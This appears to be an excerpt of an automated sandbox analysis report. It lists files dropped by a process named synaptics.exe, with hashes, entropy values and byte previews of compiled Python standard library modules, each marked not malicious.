                                                                                                                                                                                                                                  Preview:o........'-d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10541
                                                                                                                                                                                                                                  Entropy (8bit):5.329283469436137
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:rhb0oivyslc6Yc5JJ0kMzr1z37oItrg2spGuDbTM0tNWCEZC:rhGvLlTYc5JJ5Itr5spLbo0bdEZC
                                                                                                                                                                                                                                  MD5:8F57ED7194E8169FE31BFC8E51834377
                                                                                                                                                                                                                                  SHA1:184205E552E093F031BB71059E24FB8B02EBE62C
                                                                                                                                                                                                                                  SHA-256:BA8BF8E70F74250963D326F32976655778F166FCB0B1FA5D2F0E22F61BA5060E
                                                                                                                                                                                                                                  SHA-512:7F95F30DE11F5A1ED2CC3EBE337639472C5F61382C5C0ED16C043D88C123EA40BA254194D07E15A0456A831ECADC7A53EF2EE5E8F86633CB1181D058D6878761
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.A.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.a.d.a.d%d&..Z.d'd(..Z.d)d*..Z d+d,..d-d...Z!d/d0..Z"e.j#d1k.Z$d6d2d3..Z%d4d5..Z&d.S.)7a....Common operations on Posix pathnames...Instead of importing this module directly, import os and refer to.this module as os.path. The "os.path" name is an alias for this.module on Posix systems; on other systems (e.g. Windows),.os.path provides the same operations in a manner specific to that.platform, and is an alias to another module (e.g. ntpath)...Some of this can actually be useful on non-Posix systems too, e.g..for manipulation of the pathname component of URLs.........../..:z./bin:/usr/binNz./dev/null.....)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirname..commonprefix..getsize..getmtime..getatime..getctime..islink..exis
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10803
                                                                                                                                                                                                                                  Entropy (8bit):5.081147678400005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ru+pM4rfRWdufeC/PBbEy6LWf1eR/i9Z6/cWyfmrAX/I8:i+pMSQdufd/PBbEy6LWdeo9s/PyfmrCP
                                                                                                                                                                                                                                  MD5:C29D347837CC3F399DCEC927E90D9169
                                                                                                                                                                                                                                  SHA1:03F51CAC847A3FD268BCF2BD7E2A4DD87F1482DD
                                                                                                                                                                                                                                  SHA-256:B307D857ACEF696BAFF93B153E2CC8DB3AEDD56BF01911FF5123EED2176C8A10
                                                                                                                                                                                                                                  SHA-512:4E2DC0B8B24192CC82919FD9504EC153DE7F02F4D5C5E9BB9A7DE50EE824CABEF27D92C89D2686C2BC62190CE7AB5E34D78ACDB19B239EA6144A307A5E6FB08C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y1......d.Z.Y.n.w.g.d...Z.z.d.d.l.m.Z...W.n...e.yO......G.d.d...d.e...Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.u.r~e.Z.d.S.d.S.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c....................@........e.Z.d.Z.d.Z.d.S.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__..r....r.....'C:\Users\Public\M20EKMMEH2\lib\queue.pyr...................r....c....................@...r....).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........r....r....c....................@...s....e.Z.d.Z.d.Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d"d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.e.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5805
                                                                                                                                                                                                                                  Entropy (8bit):5.455191188514344
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kPp0xXxswv10ER2XWFP0nf5nizGJFNYTBTO7u10IbJJs5WkbtL4FRJpGyd/8tzOR:oqrswv27GmxMGb+rIWkOFldkS
                                                                                                                                                                                                                                  MD5:CAE93F98D141D63B416A5EC8289B3C9C
                                                                                                                                                                                                                                  SHA1:AB72B377FAAC6B2C2B3EB53D00FFF816BF5DE37F
                                                                                                                                                                                                                                  SHA-256:A2135B8E4A2C06B4E609B1A50A6EC117C447FED5566DB13C00823BB878E8560C
                                                                                                                                                                                                                                  SHA-512:68448330D31CEFA1AB4FADF4081B993B220F2D99D72696548103ADA6D6767BFC3E6D7CA748FFD3EB55059C130B3D04A6075BEFB94B7593EDD0E8D774820F551B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dV........................@...s....d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.z.d.d.l.m.Z.m.Z...W.n...e.y%......d.Z.d.Z.Y.n.w.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rWe.....d.S.d.S.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc....................C...sH...t.|.t...s.J...|.d.v.r.|.S.|.d.k.r.|.S.|.t.k.p#d.|.....k.o d.k.n.......S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..header..r.....(C:\Users\Public\M20EKMMEH2\lib\quopri.py..needsquoting....s..............".r....c....................C...sB...t.|.t...r.t.|...d.k.s.J...t.|...}.t.t.t.|.d.....t.|.d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22759
                                                                                                                                                                                                                                  Entropy (8bit):5.437994150188222
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:g151Eqqa1lrwieniMSkFVjhfFKoTWGtCX2v1b2+/ngCbWQhkcqHVG:gzJ5KniKTZCX25/1bWbcaVG
                                                                                                                                                                                                                                  MD5:7867C49BB73D059F533ED6FF4084D576
                                                                                                                                                                                                                                  SHA1:217DFD51BE39CBF67F09575A11B4B7B88A1E90BF
                                                                                                                                                                                                                                  SHA-256:482F0CEFC2795CCF8E2670508CFEF86222BBE380A708810B5157B13959E58B21
                                                                                                                                                                                                                                  SHA-512:CCAD5BD8D41ED09E5ABE9B28D033B8B76CE02A516E119CF52063617E86267DF04E4EC906F5C70FF3324A3098B588C88016DA13795194608B0263D2EB3219C829
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dg........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z"m#Z$..d.d.l%m&Z'..d.d.l(m)Z*m+Z,..d.d.l-m-Z...d.d.l.Z/d.d.l0Z0z.d.d.l1m2Z1..W.n...e3ym......d.d.l4m2Z1..Y.n.w.g.d...Z5d.e.d.....e.d.....Z6e.d...Z7d.e.d.....Z8d.Z9d.e9....Z:d.Z;G.d.d...d.e0j<..Z<G.d.d...d.e<..Z=e<..Z>e>j?Z?e>j@Z@e>jAZAe>jBZBe>jCZCe>jDZDe>jEZEe>jFZFe>jGZGe>jHZHe>jIZIe>jJZJe>jKZKe>jLZLe>jMZMe>jNZNe>jOZOe>jPZPe>jQZQe>jRZRe>jSZSe>jTZTe>jUZUd.d...ZVd#d.d...ZWeXe/d ..r.e/jYe>j?d!....eZd"k...r.eW....d.S.d.S.)$a....Random variable generators... bytes. -----. uniform bytes (values between 0 and 255).. integers. --------. uniform within range.. sequences. ---------. pick random element. pick random sample. pick weighted random sample. generate random permutation.. distributions on the real line:. ------------------------------. unifor
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14238
                                                                                                                                                                                                                                  Entropy (8bit):5.213158083593749
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:EuPJsiNrHyol2OkRFvMKUryx95qoxSrMbZ:ECJssrSokfRAry/5qoUrMbZ
                                                                                                                                                                                                                                  MD5:5B7DDE5A1BAB1970652913E316A471A7
                                                                                                                                                                                                                                  SHA1:4735362D59DC5E72A7FAC0307EA5337D0961778A
                                                                                                                                                                                                                                  SHA-256:FD28180D46DD929E4AB0AA32B771E56CAA5642B13C758B1D437C4BA90A20F319
                                                                                                                                                                                                                                  SHA-512:A57E6D9F1EA322DEFBA1A0DBFF831B3DB3450C315E7553273FDB587E51146CEB8E35C5D7AFA52CA6B067B476C470D72E0CC491D954A5C4327B3A0BE4ACDDB312
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-ds?.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y#......d.Z.Y.n.w.g.d...Z.d.Z.G.d.d...d.e.j...Z.e.....e.j.....e.j.Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d1d.d...Z.d1d.d...Z.d1d.d...Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d.d...Z.d0d.d...Z.d.d...d.D...Z.d d!..Z.e.e...d"d.....Z.e.e...d"d.....d"....Z.i.Z.d#Z d$d%..Z!e.."e ..d&d'....Z#d(d)..Z$d*d+..Z%d.d.l&Z&d,d-..Z'e&.(e.e'e!....G.d.d/..d/..Z)d.S.)2a....Support for regular expressions (RE)...This module provides regular expression matching operations similar to.those found in Perl. It supports both 8-bit and Unicode strings; both.the pattern and the strings being processed can contain null bytes and.characters outside the US ASCII range...Regular expressions can contain both special and ordinary characters..Most ordinary characters, like "A", "a", or "0", are the simplest.regular expressions; they simply match themselves. You can.concatenate ordinary characters, so last matches the string 'last'...Th
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5261
                                                                                                                                                                                                                                  Entropy (8bit):5.029386099613286
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rdnTWdW+/lUgN2VsfA2IywpvIyeyiGtJAlKgN0A7Hb:dQDk52elTicNWN
                                                                                                                                                                                                                                  MD5:364C7D3B75553FA21BDDD6970F4924A5
                                                                                                                                                                                                                                  SHA1:FD4A9207A7B8B6282D799E0C752440F4BAF07CC5
                                                                                                                                                                                                                                  SHA-256:43A0233BB63AA09C56103D4325FF290A97961EFF10750A1B0973C26F0BD9EC3E
                                                                                                                                                                                                                                  SHA-512:8B915F36213CEEBB2C0BB44FB3F84F60B53F72F98428267FD930209AEE2D934AD840109CE4CE13C56D8F5AC49834DD4C81F0720450CB2B11717018DD897C21B2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d4........................@...s\...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.G.d.d...d...Z.d.d...Z.e...Z.e.j.Z.d.S.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_ident.....c........................s......f.d.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc........................sX...t...........f.d.d...}.t...d...|._.t...d...|._.t...d...|._.t...d...|._.t...d.i...|._.|.S.).Nc........................sJ...t.|...t...f.}.|...v.r...S.....|.....z...|...}.W.....|.....|.S.....|.....w...N)...idr......add..discard)...self..key..result)...fillvalue..repr_running..user_function...)C:\Users\Public\M20EKMMEH2\lib\reprlib.py..wrapper....s......................z<recursive_repr.<locals>.decorating_function.<locals>.wrapper..__module__..__doc__..__name__..__qualname__..__annotations__)...set..getattrr....r....r....r....r....).r....r......r....).r....r....r......de
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17116
                                                                                                                                                                                                                                  Entropy (8bit):5.182023941981992
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:6jM7Dm/9rSzUEok/L1xzQ8DdIE67SQSUQGJbvRkE4wSvceC:6jM7Dm/9rSzzBdIn7SQSkbvRkE4FvceC
                                                                                                                                                                                                                                  MD5:882BC52C1C4E018CA9D9D10D2100F4D7
                                                                                                                                                                                                                                  SHA1:B464A52149E7F12E52ACEA9C976F983FCD232E9D
                                                                                                                                                                                                                                  SHA-256:687AD91A18A3FECDD5E687FAA47DA7423B74C33FA09A910AC760A5E7F2CB2B50
                                                                                                                                                                                                                                  SHA-512:1A0AADDFB83109C9DBE24302B74FD29206AA5A459491EEEF5DBA7994C0F8751A76B026A999BD1B2EA93B76C69548CC0A3802344A200BFFB3DA82DE78B9DE073E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.N.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d...Z.e.d.g.d.....Z.d.e._.e.j.d.k.rId.e.j._.d.e.j._.d.e.j._.d.e.j._.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...r.G.d.d...d.e...Z.e.e.d ..r.G.d!d"..d"e...Z.e.e.d#..r.G.d$d%..d%e...Z.e.e.d&..r.G.d'd(..d(e...Z.d)d*..Z.e.d&..r.e.Z.d.S.e.d ..r.e.Z.d.S.e.d#..r.e.Z.d.S.e.d...r.e.Z.d.S.e.Z.d.S.)+z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c....................C...s`...t.|.t...r.|.}.n.z.t.|.......}.W.n...t.t.t.f.y"......t.d...|.....d...w.|.d.k.r.t.d...|.......|.S.).z.Return a file descriptor from a file object... Parameters:. fileobj -- file object or file descriptor.. Returns:. corresponding file descriptor.. Raises:. ValueError if the object is invalid. z.I
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7793
                                                                                                                                                                                                                                  Entropy (8bit):5.51418321289583
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dQrdt23n71QxhSaL09FKXY5nzg9gn1yiEWE5cnPr+vP:Krsxb9FKo5zg9g1yLZ6PQ
                                                                                                                                                                                                                                  MD5:C6DD94A869A115C679CA914DB621E0E7
                                                                                                                                                                                                                                  SHA1:DF1F4BEE8B11744487A1083881140F26B5E6CB9F
                                                                                                                                                                                                                                  SHA-256:55756CAB04E3EEBEA0A7012A42ADB8E821629E1E3C0E624EFC26E32AC7B5ECF4
                                                                                                                                                                                                                                  SHA-512:58568EA1DD20C83627DA0A1EA6877D2CB8FC4BEE68A1588C2DFE117408C87934F84523FF648F253320A10176E443724874896344926151B7FCD340431E52EA00
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38372
                                                                                                                                                                                                                                  Entropy (8bit):5.5300430985918005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:C6QXEThEID61k7Ai7h3M/cjAgTPgtyQZuYTqGMjQ0olo4txZ:C6QXEGIeL+rTPgtyQZuYTqGMjQno4tz
                                                                                                                                                                                                                                  MD5:226C27A5F1712A5CE93FAA3F1F44813F
                                                                                                                                                                                                                                  SHA1:BA6008D8D248C7E12F4B14D93C008048FC474E58
                                                                                                                                                                                                                                  SHA-256:81D5A4524D1CC33AE8393569934DD5B14855B8BD2AC74A2F51EDE891613B0550
                                                                                                                                                                                                                                  SHA-512:EE32F606634457437B0B5B4A2E84D32C641D2862807E998C3A174FFC6CEC432591CD695FBF0E778B23F239398E6DDEECBB81240C0807A7DC4DD336E59E67CBD5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17391
                                                                                                                                                                                                                                  Entropy (8bit):5.5115150291836565
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0lp4Tn42l1QP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:pL42lug7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                                                                  MD5:B9489157B9AB2A3CC89CF592B4AC7A1D
                                                                                                                                                                                                                                  SHA1:FB660BD08202BF9F78FCE3B6B69AA52E36E9EF38
                                                                                                                                                                                                                                  SHA-256:C2435B769F5AAAEA364EDCB0BCE7CAF362CD197A46B7F897AD9784DA961F3B2C
                                                                                                                                                                                                                                  SHA-512:13BD7BFA54B199BED9E24A283B83568D860EA0DF14DE9A28F32A16C80D901F0A0DAD212A514B760571799BAE18DFD23D6C5A68EE24F93A8D969324CCD49DE4DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28974
                                                                                                                                                                                                                                  Entropy (8bit):5.536834582969358
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Ptwx/9l/P/Xkf1dTtaMTCmWwflMCMGYIeM044ZNOLe3:POxFpQbFCtmlXYIeM05nOy3
                                                                                                                                                                                                                                  MD5:680137EA6E53F2FB195CA45F26656721
                                                                                                                                                                                                                                  SHA1:27C04D5EEE754EDE14A19107482D62785BF59EED
                                                                                                                                                                                                                                  SHA-256:F97067FBB44DBE56F9140A7D91AA7035676CD1EC7752E1EF486FC85E0ECD9541
                                                                                                                                                                                                                                  SHA-512:679B33B0A40C46F91E5454C19B6FFEC7C48D688D9621DA03D1115BBA8EDBD6BE170EE591070215154443081B08DD629E4C82A71D7D3F4410D25FA9478540530B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dq........................@...sT...d.Z.d.d.l.Z.d.d.l.T.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...z.d.d.l.Z.W.n...e.y3......d.Z.Y.n.w.e.e.d.d...Z.e.e.d.d...Z.e.e.d.d...Z.g.d...Z.e...e...e.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......d.Z.d.Z.d.d...Z.e.j.......d.....r.i.Z.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d <.d!e.d"<.d#e.d$<.d%e.d&<.d'e.d(<.d)e.d*<.d+e.d,<.d-e.d.<.d/e.d0<.d1e.d2<.d3e.d4<.d5e.d6<.d7e.d8<.d9e.d:<.d;e.d<<.d=e.d><.d?e.d@<.dAe.dB<.dCe.dD<.dEe.dF<.dGe.dH<.dIe.dJ<.dKe.dL<.dMe.dN<.dOe.dP<.dQe.dR<.dSe.dT<.dUe.dV<.dWe.dX<.dYe.dZ<.d[e.d\<.d]e.d^<.d_e.d`<.dae.db<.dce.dd<.dee.df<.dge.dh<.die.dj<.dke.dl<.dme.dn<.doe.dp<.dqe.dr<.dse.dt<.due.dv<.dwe.dx<.dye.dz<.d{e.d|<.d}e.d~<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15205
                                                                                                                                                                                                                                  Entropy (8bit):5.608845979983705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Mrz34fmVm0PVclj2zdkbUzI0MXwcXBzE8yQwo39V753Mqud6LnT:MrnV8j8KAzh2G8pwoNv3Mr6LnT
                                                                                                                                                                                                                                  MD5:E33AC9A596856562715B65268E76D8CE
                                                                                                                                                                                                                                  SHA1:297F8B2B6828C72FE98710D5E73556AA0CBBBD82
                                                                                                                                                                                                                                  SHA-256:B1A7B3284EF4E056520AF0E2B4F8BD2353D2F41CD96E692E57D754255109E6CF
                                                                                                                                                                                                                                  SHA-512:FB30C4792AC231523310DF14031C1061A9D3456BA9E35CD2DA3335D8D6024608C76F9BBF0CFFC93738C883F21AC1EAF6A8F7700BE917E5E296BA83B380AF8079
                                                                                                                                                                                                                                  Malicious:false
